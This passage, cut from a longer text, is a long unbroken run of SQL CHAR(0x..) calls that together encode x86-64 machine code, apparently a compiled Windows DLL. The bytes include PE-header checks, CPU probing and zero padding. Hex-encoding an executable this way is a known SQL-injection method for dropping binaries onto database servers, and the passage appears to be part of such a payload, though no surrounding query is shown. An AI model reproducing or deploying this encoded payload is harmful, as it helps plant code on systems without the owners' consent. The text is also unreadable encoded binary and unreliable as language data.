0xf3),CHAR(0x0f),CHAR(0x7f),CHAR(0x05),CHAR(0x16),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x1f),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xc6),CHAR(0x05),CHAR(0xe9),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0xb0),CHAR(0x01),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5b),CHAR(0xc3),CHAR(0xb9),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xfa),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x18),CHAR(0x4c),CHAR(0x8b),CHAR(0xc1),CHAR(0xb8),CHAR(0x4d),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x66),CHAR(0x39),CHAR(0x05),CHAR(0xd1),CHAR(0xe4),CHAR(0xff),CHAR(0xff),CHAR(0x75),CHAR(0x76),CHAR(0x48),CHAR(0x63),CHAR(0x0d),CHAR(0x04),CHAR(0xe5),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x8d),CHAR(0x15),CHAR(0xc1),CHAR(0xe4),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x03),CHAR(0xca),CHAR(0x81),CHAR(0x39),CHAR(0x50),CHAR(0x45),CHAR(0x00),CHAR(0x00),CHAR(0x75),CHAR(0x5d),CHAR(0xb8),CHAR(0x0b),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x66),CHAR(0x39),CHAR(0x41),CHAR(0x18),CHAR(0x75),CHAR(0x52),CHAR(0x4c),CHAR(0x2b),CHAR(0xc2),CHAR(0x0f),CHAR(0xb7),CHAR(0x41),CHAR(0x14),CHAR(0x48),CHAR(0x8d),CHAR(0x51),CHAR(0x18),CHAR(0x48),CHAR(0x03),CHAR(0xd0),CHAR(0x0f),CHAR(0xb7),CHAR(0x41),CHAR(0x06),CHAR(0x48),CHAR(0x8d),CHAR(0x0c),CHAR(0x80),CHAR(0x4c),CHAR(0x8d),CHAR(0x0c),CHAR(0xca),CHAR(0x48),CHAR(0x89),CHAR(0x14),CHAR(0x24),CHAR(0x49),CHAR(0x3b),CHAR(0xd1),CHAR(0x74),CHAR(0x2b),CHAR(0x8b),CHAR(0x4a),CHAR(0x0c),CHAR(0x4c),CHAR(0x3b),CHAR(0xc1),CHAR(0x72),CHAR(0x1d),CHAR(0x8b),CHAR(0x42),CHAR(0x08),CHAR(0x03),CHAR(0xc1),CHAR(0x4c),CHAR(0x3b),CHAR(0xc0),CHAR(0x73),CHAR(0x13),CHAR(0x48),CHAR(0x85),CHAR(0xd2),CHAR(0x74),CHAR(0x14),CHAR(0x83),CHAR(0x7a),CHAR(0x24),CHAR(0x00),CHAR(0x7d),CHAR(0x04),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x14),CHAR(0xb0),CHAR(0x01),CHAR(0xeb),CHAR(0x10),CHAR(0x48),CHAR(0x83),CHAR(0xc2),CHAR(0x28),CHAR(0xeb),CHAR(0xcc),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x06),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x02),CHAR(0x32),CHAR(0xc0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x18),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0x40),CHAR(0x53),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x8a),CHAR(0xd9),CHAR(0xe8),CHAR(0xc7),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x33),CHAR(0xd2),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x0b),CHAR(0x84),CHAR(0xdb),CHAR(0x75),CHAR(0x07),CHAR(0x48),CHAR(0x87),CHAR(0x15),CHAR(0x16),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5b),CHAR(0xc3),CHAR(0x40),CHAR(0x53),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x80),CHAR(0x3d),CHAR(0x0b),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x8a),CHAR(0xd9),CHAR(0x74),CHAR(0x04),CHAR(0x84),CHAR(0xd2),CHAR(0x75),CHAR(0x0c),CHAR(0xe8),CHAR(0xf6),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x8a),CHAR(0xcb),CHAR(0xe8),CHAR(0xef),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0xb0),CHAR(0x01),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5b),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x8d),CHAR(0x05),CHAR(0x25),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x83),CHAR(0x25),CHAR(0x15),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x55),CHAR(0x48),CHAR(0x8d),CHAR(0xac),CHAR(0x24),CHAR(0x40),CHAR(0xfb),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x81),CHAR(0xec),CHAR(0xc0),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xd9),CHAR(0xb9),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x6b),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x04),CHAR(0x8b),CHAR(0xcb),CHAR(0xcd),CHAR(0x29),CHAR(0xb9),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xc5),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x33),CHAR(0xd2),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0xf0),CHAR(0x41),CHAR(0xb8),CHAR(0xd0),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x5a),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0xf0),CHAR(0xff),CHAR(0x15),CHAR(0x9e),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x9d),CHAR(0xe8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x95),CHAR(0xd8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xcb),CHAR(0x45),CHAR(0x33),CHAR(0xc0),CHAR(0xff),CHAR(0x15),CHAR(0x8c),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x3c),CHAR(0x48),CHAR(0x83),CHAR(0x64),CHAR(0x24),CHAR(0x38),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x8d),CHAR(0xe0),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x95),CHAR(0xd8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xc8),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x4c),CHAR(0x8b),CHAR(0xc3),CHAR(0x48),CHAR(0x8d),CHAR(0x8d),CHAR(0xe8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x28),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0xf0),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x20),CHAR(0x33),CHAR(0xc9),CHAR(0xff),CHAR(0x15),CHAR(0x53),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x85),CHAR(0xc8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x4c),CHAR(0x24),CHAR(0x50),CHAR(0x48),CHAR(0x89),CHAR(0x85),CHAR(0xe8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x33),CHAR(0xd2),CHAR(0x48),CHAR(0x8d),CHAR(0x85),CHAR(0xc8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x41),CHAR(0xb8),CHAR(0x98),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc0),CHAR(0x08),CHAR(0x48),CHAR(0x89),CHAR(0x85),CHAR(0x88),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xc3),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x85),CHAR(0xc8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x60),CHAR(0xc7),CHAR(0x44),CHAR(0x24),CHAR(0x50),CHAR(0x15),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0xc7),CHAR(0x44),CHAR(0x24),CHAR(0x54),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x15),CHAR(0x5f),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x83),CHAR(0xf8),CHAR(0x01),CHAR(0x48),CHAR(0x8d),CHAR(0x44),CHAR(0x24),CHAR(0x50),CHAR(0x48),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x40),CHAR(0x48),CHAR(0x8d),CHAR(0x45),CHAR(0xf0),CHAR(0x0f),CHAR(0x94),CHAR(0xc3),CHAR(0x48),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x48),CHAR(0x33),CHAR(0xc9),CHAR(0xff),CHAR(0x15),CHAR(0xee),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x4c),CHAR(0x24),CHAR(0x40),CHAR(0xff),CHAR(0x15),CHAR(0xdb),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x0c),CHAR(0x84),CHAR(0xdb),CHAR(0x75),CHAR(0x08),CHAR(0x8d),CHAR(0x48),CHAR(0x03),CHAR(0xe8),CHAR(0xbf),CHAR(0xfe),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x8b),CHAR(0x9c),CHAR(0x24),CHAR(0xd0),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x81),CHAR(0xc4),CHAR(0xc0),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x5d),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x1d),CHAR(0xef),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x3d),CHAR(0xe8),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x12),CHAR(0x48),CHAR(0x8b),CHAR(0x03),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x06),CHAR(0xff),CHAR(0x15),CHAR(0x70),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc3),CHAR(0x08),CHAR(0x48),CHAR(0x3b),CHAR(0xdf),CHAR(0x72),CHAR(0xe9),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5f),CHAR(0xc3),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x1d),CHAR(0xc3),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x3d),CHAR(0xbc),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x12),CHAR(0x48),CHAR(0x8b),CHAR(0x03),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x06),CHAR(0xff),CHAR(0x15),CHAR(0x34),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc3),CHAR(0x08),CHAR(0x48),CHAR(0x3b),CHAR(0xdf),CHAR(0x72),CHAR(0xe9),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5f),CHAR(0xc3),CHAR(0xc2),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x74),CHAR(0x24),CHAR(0x18),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x10),CHAR(0x33),CHAR(0xc0),CHAR(0x33),CHAR(0xc9),CHAR(0x0f),CHAR(0xa2),CHAR(0x44),CHAR(0x8b),CHAR(0xc1),CHAR(0x45),CHAR(0x33),CHAR(0xdb),CHAR(0x44),CHAR(0x8b),CHAR(0xcb),CHAR(0x41),CHAR(0x81),CHAR(0xf0),CHAR(0x6e),CHAR(0x74),CHAR(0x65),CHAR(0x6c),CHAR(0x41),CHAR(0x81),CHAR(0xf1),CHAR(0x47),CHAR(0x65),CHAR(0x6e),CHAR(0x75),CHAR(0x44),CHAR(0x8b),CHAR(0xd2),CHAR(0x8b),CHAR(0xf0),CHAR(0x33),CHAR(0xc9),CHAR(0x41),CHAR(0x8d),CHAR(0x43),CHAR(0x01),CHAR(0x45),CHAR(0x0b),CHAR(0xc8),CHAR(0x0f),CHAR(0xa2),CHAR(0x41),CHAR(0x81),CHAR(0xf2),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x49),CHAR(0x89),CHAR(0x04),CHAR(0x24),CHAR(0x45),CHAR(0x0b),CHAR(0xca),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x04),CHAR(0x8b),CHAR(0xf9),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x08),CHAR(0x89),CHAR(0x54),CHAR(0x24),CHAR(0x0c),CHAR(0x75),CHAR(0x50),CHAR(0x48),CHAR(0x83),CHAR(0x0d),CHAR(0xe3),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xf0),CHAR(0x3f),CHAR(0xff),CHAR(0x0f),CHAR(0x3d),CHAR(0xc0),CHAR(0x06),CHAR(0x01),CHAR(0x00),CHAR(0x74),CHAR(0x28),CHAR(0x3d),CHAR(0x60),CHAR(0x06),CHAR(0x02),CHAR(0x00),CHAR(0x74),CHAR(0x21),CHAR(0x3d),CHAR(0x70),CHAR(0x06),CHAR(0x02),CHAR(0x00),CHAR(0x74),CHAR(0x1a),CHAR(0x05),CHAR(0xb0),CHAR(0xf9),CHAR(0xfc),CHAR(0xff),CHAR(0x83),CHAR(0xf8),CHAR(0x20),CHAR(0x77),CHAR(0x24),CHAR(0x48),CHAR(0xb9),CHAR(0x01),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x0f),CHAR(0xa3),CHAR(0xc1),CHAR(0x73),CHAR(0x14),CHAR(0x44),CHAR(0x8b),CHAR(0x05),CHAR(0xb4),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0x41),CHAR(0x83),CHAR(0xc8),CHAR(0x01),CHAR(0x44),CHAR(0x89),CHAR(0x05),CHAR(0xa9),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x07),CHAR(0x44),CHAR(0x8b),CHAR(0x05),CHAR(0xa0),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x8d),CHAR(0x48),CHAR(0xfb),CHAR(0x3b),CHAR(0xf0),CHAR(0x7c),CHAR(0x26),CHAR(0x33),CHAR(0xc9),CHAR(0x0f),CHAR(0xa2),CHAR(0x89),CHAR(0x04),CHAR(0x24),CHAR(0x44),CHAR(0x8b),CHAR(0xdb),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x04),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x08),CHAR(0x89),CHAR(0x54),CHAR(0x24),CHAR(0x0c),CHAR(0x0f),CHAR(0xba),CHAR(0xe3),CHAR(0x09),CHAR(0x73),CHAR(0x0a),CHAR(0x45),CHAR(0x0b),CHAR(0xc1),CHAR(0x44),CHAR(0x89),CHAR(0x05),CHAR(0x6d),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0xc7),CHAR(0x05),CHAR(0x4f),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x89),CHAR(0x0d),CHAR(0x4c),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0xba),CHAR(0xe7),CHAR(0x14),CHAR(0x0f),CHAR(0x83),CHAR(0x91),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x89),CHAR(0x0d),CHAR(0x37),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0xbb),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x89),CHAR(0x1d),CHAR(0x30),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0xba),CHAR(0xe7),CHAR(0x1b),CHAR(0x73),CHAR(0x79),CHAR(0x0f),CHAR(0xba),CHAR(0xe7),CHAR(0x1c),CHAR(0x73),CHAR(0x73),CHAR(0x33),CHAR(0xc9),CHAR(0x0f),CHAR(0x01),CHAR(0xd0),CHAR(0x48),CHAR(0xc1),CHAR(0xe2),CHAR(0x20),CHAR(0x48),CHAR(0x0b),CHAR(0xd0),CHAR(0x48),CHAR(0x89),CHAR(0x54),CHAR(0x24),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0x44),CHAR(0x24),CHAR(0x20),CHAR(0x22),CHAR(0x22),CHAR(0xc3),CHAR(0x3a),CHAR(0xc3),CHAR(0x75),CHAR(0x57),CHAR(0x8b),CHAR(0x05),CHAR(0x02),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0x83),CHAR(0xc8),CHAR(0x08),CHAR(0xc7),CHAR(0x05),CHAR(0xf1),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x89),CHAR(0x05),CHAR(0xef),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x41),CHAR(0xf6),CHAR(0xc3),CHAR(0x20),CHAR(0x74),CHAR(0x38),CHAR(0x83),CHAR(0xc8),CHAR(0x20),CHAR(0xc7),CHAR(0x05),CHAR(0xd8),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x89),CHAR(0x05),CHAR(0xd6),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x00),CHAR(0x00),CHAR(0x03),CHAR(0xd0),CHAR(0x44),CHAR(0x23),CHAR(0xd8),CHAR(0x44),CHAR(0x3b),CHAR(0xd8),CHAR(0x75),CHAR(0x18),CHAR(0x48),CHAR(0x8b),CHAR(0x44),CHAR(0x24),CHAR(0x20),CHAR(0x24),CHAR(0xe0),CHAR(0x3c),CHAR(0xe0),CHAR(0x75),CHAR(0x0d),CHAR(0x83),CHAR(0x0d),CHAR(0xb7),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x89),CHAR(0x1d),CHAR(0xad),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x28),CHAR(0x33),CHAR(0xc0),CHAR(0x48),CHAR(0x8b),CHAR(0x74),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x10),CHAR(0x5f),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xb8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0x33),CHAR(0xc0),CHAR(0x39),CHAR(0x05),CHAR(0xa0),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0x95),CHAR(0xc0),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xff),CHAR(0x25),CHAR(0x92),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xd4),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xd6),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xd8),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xe2),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xe4),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xe6),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xe8),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xea),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xec),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xee),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xf0),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xb0),CHAR(0x01),CHAR(0xc3),CHAR(0xcc),CHAR(0x33),CHAR(0xc0),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x66),CHAR(0x66),CHAR(0x0f),CHAR(0x1f),CHAR(0x84),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xe0),CHAR(0x40),CHAR(0x55),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0xea),CHAR(0x8a),CHAR(0x4d),CHAR(0x40),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5d),CHAR(0xe9),CHAR(0x9c),CHAR(0xfb),CHAR(0xff),CHAR(0xff),CHAR(0xcc),CHAR(0x40),CHAR(0x55),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0xea),CHAR(0x8a),CHAR(0x4d),CHAR(0x20),CHAR(0xe8),CHAR(0x8a),CHAR(0xfb),CHAR(0xff),CHAR(0xff),CHAR(0x90),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5d),CHAR(0xc3),CHAR(0xcc),CHAR(0x40),CHAR(0x55),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0xea),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5d),CHAR(0xe9),CHAR(0xeb),CHAR(0xf9),CHAR(0xff),CHAR(0xff),CHAR(0xcc),CHAR(0x40),CHAR(0x55),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0xea),CHAR(0x48),CHAR(0x8b),CHAR(0x01),CHAR(0x8b),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x28),CHAR(0x89),CHAR(0x54),CHAR(0x24),CHAR(0x20),CHAR(0x4c),CHAR(0x8d),CHAR(0x0d),CHAR(0x80),CHAR(0xf2),CHAR(0xff),CHAR(0xff),CHAR(0x4c),CHAR(0x8b),CHAR(0x45),CHAR(0x70),CHAR(0x8b),CHAR(0x55),CHAR(0x68),CHAR(0x48),CHAR(0x8b),CHAR(0x4d),CHAR(0x60),CHAR(0xe8),CHAR(0x2c),CHAR(0xf9),CHAR(0xff),CHAR(0xff),CHAR(0x90),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x30),CHAR(0x5d),CHAR(0xc3),CHAR(0xcc),CHAR(0x40),CHAR(0x55),CHAR(0x48),CHAR(0x8b),CHAR(0xea),CHAR(0x48),CHAR(0x8b),CHAR(0x01),CHAR(0x33),CHAR(0xc9),CHAR(0x81),CHAR(0x38),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x0f),CHAR(0x94),CHAR(0xc1),CHAR(0x8b),CHAR(0xc1),CHAR(0x5d),CHAR(0xc3),CHAR(0xcc),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHA